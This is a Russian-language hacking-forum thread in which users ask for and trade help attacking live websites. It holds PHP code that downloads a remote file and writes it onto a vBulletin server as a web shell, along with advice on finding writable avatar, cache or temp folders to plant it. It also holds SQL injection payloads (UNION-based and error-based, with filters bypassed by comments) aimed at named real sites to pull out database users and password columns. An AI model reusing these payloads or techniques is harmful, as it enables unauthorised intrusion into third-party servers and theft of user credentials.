Ребят, вопрос... Заливка шелла на воблу через плагины. (ajax_complete) Код: PHP: $linky="http://site.com/blabla/name.txt"; $saved="./ololo.php"; $from=fopen("$linky","r"); $to=fopen("$saved","w"); while(!feof($from)){ $string=fgets($from,4096); fputs($to,$string); } fclose($to); echo 'done'; fclose($from); При заходе на site.com/forum/ajax.php выбивает: Code: Warning: fopen(./ololo.php) [function.fopen]: failed to open stream: Permission denied in [path]/ajax.php(1279) : eval()'d code on line 4 Warning: fputs(): supplied argument is not a valid stream resource in [path]/ajax.php(1279) : eval()'d code on line 7 Warning: fputs(): supplied argument is not a valid stream resource in [path]/ajax.php(1279) : eval()'d code on line 7 Warning: fputs(): supplied argument is not a valid stream resource in [path]/ajax.php(1279) : eval()'d code on line 7 [куча таких же строчек] Warning: fclose(): supplied argument is not a valid stream resource in [path]/ajax.php(1279) : eval()'d code on line 9 done Вопрос заключается в том, как же это исправить, либо, есть ли какая альтернатива?
Нет прав на запись в эту папку для этого скрипта. Ищи ту, в которую можно залить (зачастую с картинками, css, js)
Искать папку с правами на запись. Вроде бы это очевидно. Посмотри куда заливаются аватарки на форуме, если не в БД сэйвятся, то лей в ту же директорию и шелл.
Плагины тут не причём. Это нормальные настройки на сервере на всю папку. Ищи те, что я сказал, у некоторых цмс есть свои темповые папки или папки под кэш, в них должно залиться(upd: если они конечно юзались, а то так могут и стоять права, при которых ты не сможешь залить)
Помогите плиз. разобраться с таким выражением, как дальше его раскрутить? (все испробовал дальше не могу продвинуться, как то не стандартно с кавычками...) -ttp://www.passion.ru/piknik.php/view/(2)union(select(1),version(),3)
Как бы раскрутить.. Всем привет! В строку поиска ввожу qwe' asd Получаю такое: В строке поиска текст меняется на qwe\' asd Выводится ошибка: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%') or (UPPER(`anot`) like '%ASD%') and (UPPER(`anot`) like '%QWE'%') or (UPP' at line 1 Query: select * from `news` where ( (UPPER(`head`) like '%ASD%') and (UPPER(`head`) like '%QWE'%') or (UPPER(`anot`) like '%ASD%') and (UPPER(`anot`) like '%QWE'%') or (UPPER(`text`) like '%ASD%') and (UPPER(`text`) like '%QWE'%')) and `hide`=1 order by date desc Можно как-то раскрутить..? сам пробовал, что-то не получается
Ток учти, что group_concat возвращает до 1кb инфы. Видно же где неправильно ты делаешь то. 1') order by XXX--+ и подбираешь кол-во столбцов, меняешь на юнион и вуаля. Или order by XXX--+ меняешь на error-based sql inj
Code: asd qwe'))ORDER/*wtf*/BY(10) -- Code: asd qwe'))UNION(SELECT(1),(2),(3)from(table)) -- Очевидно же, что нельзя допускать пробелов, так как идет explode(' ', $some) и после implode.
Такой вопрос, нашол нужную мне колонку http://goldsauna.ru/articles.html?id=-7%27+union+select+1,2,column_name,4,5+from+information_schema.columns+where+table_name=0x7573657273+limit+2,1--+ хочу вывести http://goldsauna.ru/articles.html?id=-7+union+select+1,2,passwd,4,5+from+users--+ а нифига не выводит, почему?
Получилось вот так: Code: ass'))/**/and/**/1=(select/**/1/**/from(select/**/count(*),concat((select/**/concat_ws(':',user(),version(),database())),floor(Rand(0)*2))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)/**/and/**/(('1%'='1 Всем спасибо!
http://goldsauna.ru/articles.html?id=-7%27+union+select+1,2,passwd,4,5+from+goldsauna.users--+ qaz эти элементарные шаги описаны почти во всех мануалах
Извиняюсь что занимаю у вас время.Возник вопрос.Собсно сформулировал запрос вида Code: http://site.com/menu.php?form_id=-33+union+select+1,2,group_concat(column_name)+FROM+INFORMATION_SCHEMA.columns+where+table_name=char(99,109,115,95,115,121,115,116,101,109,95,117,115,101,114,115)-- В браузере выдает Code: id,name,login,password,enabled Дальше пробую Code: http://site.com/menu.php?form_id=-33+union+select+1,2,group_concat(id,0x3a,user,0x3a,pass)+from+cms_system_users-- Но ничего не выводит,собсно как правильно?Спасибо за внимание